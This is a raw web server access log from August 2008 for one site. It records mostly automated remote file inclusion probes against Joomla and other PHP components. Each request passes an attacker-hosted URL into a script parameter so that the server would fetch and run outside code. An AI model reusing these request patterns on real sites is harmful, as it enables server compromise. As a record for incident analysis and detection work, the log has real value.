203.146.102.38 - - [07/Aug/2008:12:36:20 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:36:22 -0700] "GET /logs/access_080116.log//index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:36:24 -0700] "GET //index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:36:43 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:36:44 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:36:44 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:36:44 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:36:44 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:36:45 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:37:05 -0700] "GET /logs/access_080219.log//admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:37:05 -0700] "GET /logs/access_080219.log//admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:37:08 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:37:10 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:37:20 -0700] "GET /logs/access_080125.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:37:28 -0700] "GET /logs/access_071116.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:12:37:43 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:37:47 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:37:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:37:50 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:37:50 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:37:50 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:37:50 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:37:51 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:37:51 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:38:07 -0700] "GET /logs/access_080215.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:38:12 -0700] "GET /logs/access_071218.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:38:39 -0700] "GET /logs/access_080404.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:38:39 -0700] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:38:39 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:38:45 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:39:48 -0700] "GET /logs/access_080116.log//index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:39:48 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:39:49 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:39:50 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:39:54 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:39:59 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:40:05 -0700] "GET /logs/access_080207.log///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:40:05 -0700] "GET /logs/access_080207.log///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:40:12 -0700] "GET /logs/access_080324.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:24 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:24 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:25 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:25 -0700] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:27 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:28 -0700] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.56.99.197 - - [07/Aug/2008:12:40:28 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:41:09 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:41:09 -0700] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:12:41:13 -0700] "GET /logs/access_080513.log//index.php?option=com_letterman&task=view&Itemid=170&id=4&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:12:41:15 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=170&id=4&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 200 18695 "-" "libwww-perl/5.805" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:41:15 -0700] "GET /logs/index.php?body=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:12:41:15 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=170&id=4&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:41:16 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:41:18 -0700] "GET /index.php?body=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18359 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:41:18 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:12:41:36 -0700] "GET /logs/access_080211.log/includes/phpdig/includes/config.php?relative_script_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:12:41:37 -0700] "GET /includes/phpdig/includes/config.php?relative_script_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:12:41:37 -0700] "GET /logs/includes/phpdig/includes/config.php?relative_script_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:42:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:42:25 -0700] "GET /logs/access_080229.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:42:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:42:42 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:42:43 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:42:43 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:42:45 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:42:48 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:42:49 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:43:10 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:43:12 -0700] "GET /index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 5829 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:43:15 -0700] "GET /logs/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.25 - - [07/Aug/2008:12:44:13 -0700] "GET /logs/access_080305.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:44:16 -0700] "GET /logs/access_080118.log//index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:44:16 -0700] "GET /logs/access_080130.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:44:20 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:44:21 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:12:44:29 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:44:29 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:44:30 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:44:48 -0700] "GET /logs/access_080303.log///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:44:49 -0700] "GET /logs/access_080404.log/db.php?path_local=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:44:51 -0700] "GET /logs/access_080303.log///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:44:57 -0700] "GET /db.php?path_local=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:44:59 -0700] "GET /logs/db.php?path_local=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:45:11 -0700] "GET /logs/access_080401.log/db.php?path_local=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.133.204.228 - - [07/Aug/2008:12:45:19 -0700] "GET /logs/access.log/index2.php?x=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.133.204.228 - - [07/Aug/2008:12:45:19 -0700] "GET /index2.php?x=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.133.204.228 - - [07/Aug/2008:12:45:19 -0700] "GET /logs/index2.php?x=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:45:40 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:45:46 -0700] "GET /logs/access_080227.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:45:46 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:45:46 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:46:23 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:46:24 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:46:27 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:46:33 -0700] "GET /logs/access_080121.log//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:46:33 -0700] "GET //components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:46:33 -0700] "GET /logs//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:46:34 -0700] "GET /logs/access_080216.log//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:46:37 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.133.204.228 - - [07/Aug/2008:12:46:57 -0700] "GET /logs/access_080117.log/index2.php?x=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:47:31 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:47:31 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:47:34 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:47:35 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:47:37 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:47:37 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:12:47:52 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:12:47:52 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:12:47:53 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:48:03 -0700] "GET /logs/access_080324.log/index.php?body=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:48:03 -0700] "GET /logs/access_080324.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:48:05 -0700] "GET /index.php?body=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18375 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:48:05 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:48:06 -0700] "GET /logs/index.php?body=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:48:06 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:48:16 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
